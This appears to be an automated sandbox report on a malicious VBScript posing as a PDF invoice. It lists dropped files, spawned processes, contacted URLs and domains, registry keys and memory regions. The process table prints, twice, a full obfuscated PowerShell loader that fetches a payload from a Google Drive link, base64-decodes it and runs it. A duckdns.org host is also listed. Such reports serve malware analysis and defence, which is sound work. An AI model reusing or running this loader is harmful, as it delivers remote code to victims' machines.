Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Faktura_82666410_1361590461#U00b7pdf.vbe
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdpbnqc2.4i3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfmeozqa.3ww.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2ws2ubf.ccr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3w3pvjg.gej.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Kanalseparationen.Gte
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging
Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for(
$Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function
Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al
ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F
den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve
PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban
/India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage
rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A
ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt
wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA
rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal
';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs
(Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan
efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld
TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg
UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe
PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma
TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr
inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr
Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun
koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes
'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej
Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts
I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat
apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum
laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom
');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo
SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa
eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs
(Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch
mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG
encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla
taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d
') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo
Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli
slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS
Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes
'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat
iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm
l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs
(Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick
Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo
eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent
bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn
set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr
OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS
heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena.
LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP
uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU
Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit
tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco,
Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging
Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for(
$Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function
Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al
ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F
den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve
PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban
/India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage
rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A
ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt
wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA
rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal
';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs
(Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan
efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld
TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg
UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe
PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma
TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr
inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr
Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun
koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes
'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej
Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts
I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat
apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum
laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom
');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo
SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa
eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs
(Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch
mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG
encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla
taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d
') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo
Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli
slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS
Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes
'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat
iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm
l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs
(Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick
Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo
eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent
bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn
set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr
OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS
heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena.
LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP
uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU
Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit
tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco,
Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/6
|
unknown
|
||
|
https://drive.usercontent.google.com:PSGP
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://aka.ms/pscore6lBfq
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.185.142
|
||
|
drive.usercontent.google.com
|
216.58.206.65
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.185.142
|
drive.google.com
|
United States
|
||
|
216.58.206.65
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5A0D000
|
trusted library allocation
|
page read and write
|
|
|
|
46BD000
|
heap
|
page read and write
|
|
|
|
1E577A32000
|
trusted library allocation
|
page read and write
|
|
|
|
85E0000
|
direct allocation
|
page execute and read and write
|
|
|
|
8EC2000
|
direct allocation
|
page execute and read and write
|
|
|
|
2D44000
|
trusted library allocation
|
page read and write
|
||
|
497E000
|
stack
|
page read and write
|
||
|
1E568849000
|
trusted library allocation
|
page read and write
|
||
|
1E5698D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page readonly
|
||
|
834E000
|
stack
|
page read and write
|
||
|
1E568831000
|
trusted library allocation
|
page read and write
|
||
|
1FCDE000
|
stack
|
page read and write
|
||
|
214F7225000
|
heap
|
page read and write
|
||
|
4748000
|
heap
|
page read and write
|
||
|
1E569745000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
214F9033000
|
heap
|
page read and write
|
||
|
1E500020000
|
heap
|
page read and write
|
||
|
46EE000
|
heap
|
page read and write
|
||
|
B9543FE000
|
stack
|
page read and write
|
||
|
7FFD9B747000
|
trusted library allocation
|
page read and write
|
||
|
1E569BD8000
|
trusted library allocation
|
page read and write
|
||
|
1FFFE000
|
stack
|
page read and write
|
||
|
214F9123000
|
heap
|
page read and write
|
||
|
1E57FE50000
|
heap
|
page execute and read and write
|
||
|
1E569749000
|
trusted library allocation
|
page read and write
|
||
|
8650000
|
direct allocation
|
page read and write
|
||
|
4A10000
|
direct allocation
|
page read and write
|
||
|
1E565F40000
|
heap
|
page read and write
|
||
|
7FFD9B720000
|
trusted library allocation
|
page execute and read and write
|
||
|
214F916E000
|
heap
|
page read and write
|
||
|
47FE000
|
unkown
|
page read and write
|
||
|
7FFD9B580000
|
trusted library allocation
|
page read and write
|
||
|
B9549FE000
|
stack
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
214F71A1000
|
heap
|
page read and write
|
||
|
CE5107E000
|
stack
|
page read and write
|
||
|
1E5000A9000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
214F7214000
|
heap
|
page read and write
|
||
|
1E565DC0000
|
heap
|
page read and write
|
||
|
6E7000
|
stack
|
page read and write
|
||
|
8010000
|
trusted library allocation
|
page execute and read and write
|
||
|
7490000
|
trusted library allocation
|
page execute and read and write
|
||
|
B9544FE000
|
stack
|
page read and write
|
||
|
CE50EFD000
|
stack
|
page read and write
|
||
|
7FEE000
|
stack
|
page read and write
|
||
|
2B41000
|
heap
|
page read and write
|
||
|
478E000
|
stack
|
page read and write
|
||
|
8D00000
|
direct allocation
|
page execute and read and write
|
||
|
CE511F8000
|
stack
|
page read and write
|
||
|
1E56975C000
|
trusted library allocation
|
page read and write
|
||
|
8610000
|
direct allocation
|
page read and write
|
||
|
8040000
|
heap
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
8020000
|
heap
|
page read and write
|
||
|
49BF000
|
stack
|
page read and write
|
||
|
467A000
|
heap
|
page read and write
|
||
|
214F9121000
|
heap
|
page read and write
|
||
|
7FFD9B57B000
|
trusted library allocation
|
page read and write
|
||
|
214F9167000
|
heap
|
page read and write
|
||
|
5302000
|
trusted library allocation
|
page read and write
|
||
|
2DFA000
|
heap
|
page read and write
|
||
|
1E567E6A000
|
trusted library allocation
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page read and write
|
||
|
6CD0000
|
direct allocation
|
page read and write
|
||
|
4660000
|
heap
|
page read and write
|
||
|
1FF5E000
|
stack
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
8090000
|
trusted library allocation
|
page read and write
|
||
|
7161000
|
heap
|
page read and write
|
||
|
8600000
|
direct allocation
|
page read and write
|
||
|
7FFD9B745000
|
trusted library allocation
|
page read and write
|
||
|
214F716E000
|
heap
|
page read and write
|
||
|
214F71A1000
|
heap
|
page read and write
|
||
|
842A000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1FF1D000
|
stack
|
page read and write
|
||
|
1E567E58000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B71A000
|
trusted library allocation
|
page read and write
|
||
|
214F913A000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
1E5779D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B563000
|
trusted library allocation
|
